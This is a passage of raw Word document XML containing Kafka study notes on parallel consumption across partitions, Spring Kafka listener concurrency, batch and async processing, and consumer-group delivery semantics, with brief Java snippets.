        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7775E2FA"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Consumer Group</w:t>
      </w:r>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure your consumers are part of the same consumer group. Kafka will distribute the partitions among the available consumers in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0091918D"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Multiple Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Configure multiple consumer threads or instances to read from different partitions concurrently. Each consumer will get assigned a partition, ensuring parallel processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B898418"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2. Use Kafka's @KafkaListener with Concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159D7D91"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using Spring Kafka, you can configure the consumer to handle multiple partitions concurrently by setting the concurrency property in the @KafkaListener annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4341C826"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@KafkaListener</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">topics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your-topic"</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> concurrency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5"</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA822DC"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0088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> listen</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> message</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6600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464E2F95"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Process the message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07F868" w14:textId="02A3495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980414"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFAB67E"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This way, you can have multiple threads consuming messages from different partitions simultaneously, even if there are only 10 partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F37EB39"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3. Leverage Kafka Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F47AF50"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Kafka Streams allows you to process data in parallel while maintaining message ordering per partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D8673"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Kafka Streams automatically handles the parallel processing of multiple partitions by creating multiple threads for each partition. You can scale the number of threads based on the number of partitions you have.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BBC352"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If you're looking to process the data in a more complex manner (e.g., windowing, aggregation), Kafka Streams is highly optimized for such tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5540D696"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4. Async Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375225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processing each record (line) in a single partition sequentially, you can utilize asynchronous processing within the consumer thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB43CE0" w14:textId="77777777" w:rsidR="00096A40" w:rsidRPr="00096A40" w:rsidRDefault="00096A40" w:rsidP="00096A40">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For example, use CompletableFuture or thread pools to parallelize the processing of individual records within the consumer thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30903737"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5. Batch Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A30AA7"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reading one message at a time is not strictly necessary, consider using batch processing. Instead of reading and processing one message per poll, you can read multiple messages and process them in bulk. Kafka's consumer API allows you to control the batch size (max.poll.records), which could increase throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DC820F"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6. Partition Assignment Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7647A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you're using a custom partition assignment strategy, ensure that the partitions are distributed evenly across consumers. Avoid uneven distribution of partitions across consumer threads, as that could cause certain threads to be idle while others are overwhelmed with data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A88399"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Example of Parallel Consumption in Spring Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283B5568"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@KafkaListener</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">topics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your-topic"</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> concurrency </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008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"10"</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07484709"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> listenToMultiplePartitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ConsumerRecord</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> record</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9C5FC"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00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Parallel processing logic here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D4AB6" w14:textId="77777777"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    processRecord</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>record</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C54A26" w14:textId="0750FA93" w:rsidR="00184FE4" w:rsidRPr="00184FE4" w:rsidRDefault="00184F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097763"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00184FE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531CD422"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n this case, setting concurrency = 10 means that up to 10 threads can consume from 10 partitions in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1402F91E" w14:textId="77777777" w:rsidR="00096A40" w:rsidRPr="00096A40" w:rsidRDefault="00096A40" w:rsidP="00096A40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511BA26E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Multi-threading</w:t>
      </w:r>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is essential to process data from multiple partitions concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C332815"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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to distribute partition consumption across consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41958A77"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n Spring Kafka, set the concurrency property to read multiple partitions in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDD318"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If processing data sequentially isn't required, implement batch processing or async processing for improved throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC80DB8" w14:textId="77777777" w:rsidR="00096A40" w:rsidRPr="00096A40" w:rsidRDefault="00096A40" w:rsidP="00096A40">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00096A40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This approach ensures you're fully utilizing the 10 partitions and processing messages in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E38D6E" w14:textId="78E846CE" w:rsidR="00096A40" w:rsidRPr="00096A40" w:rsidRDefault="00000000" w:rsidP="00096A40">
      <w:pPr>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1F64CBB9">
          <v:rect id="_x0000_i3572" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0089A34A" w14:textId="2FC3D871" w:rsidR="004E09A2" w:rsidRPr="00D87893" w:rsidRDefault="004E09A2" w:rsidP="004E09A2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="882" w:name="_Toc197868096"/>
      <w:r w:rsidRPr="004E09A2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you have 1 consumer which is listening to 1 topic which is having 1 partition through this 1 message when consumer is reading that message and in the same consumer group there is one more consumer groups so will it be able to read the same message</w:t>
      </w:r>
      <w:r w:rsidRPr="00D87893">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="882"/>
    </w:p>
    <w:p w14:paraId="01448975" w14:textId="5AA55BAB" w:rsidR="009C08FC" w:rsidRPr="009C08FC" w:rsidRDefault="009C08FC" w:rsidP="00654A3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No, the </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>second consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not be able to read the same message</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the topic if it belongs to the </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the first consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5A0028" w14:textId="77777777" w:rsidR="009C08FC" w:rsidRPr="009C08FC" w:rsidRDefault="009C08FC" w:rsidP="009C08FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C4D048"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Kafka Consumer Group Concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59771F9D"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a collection of consumers that work together to consume messages from a topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A04B27C"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Each message in a partition is </w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delivered to only one consumer within the same consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="009C08FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
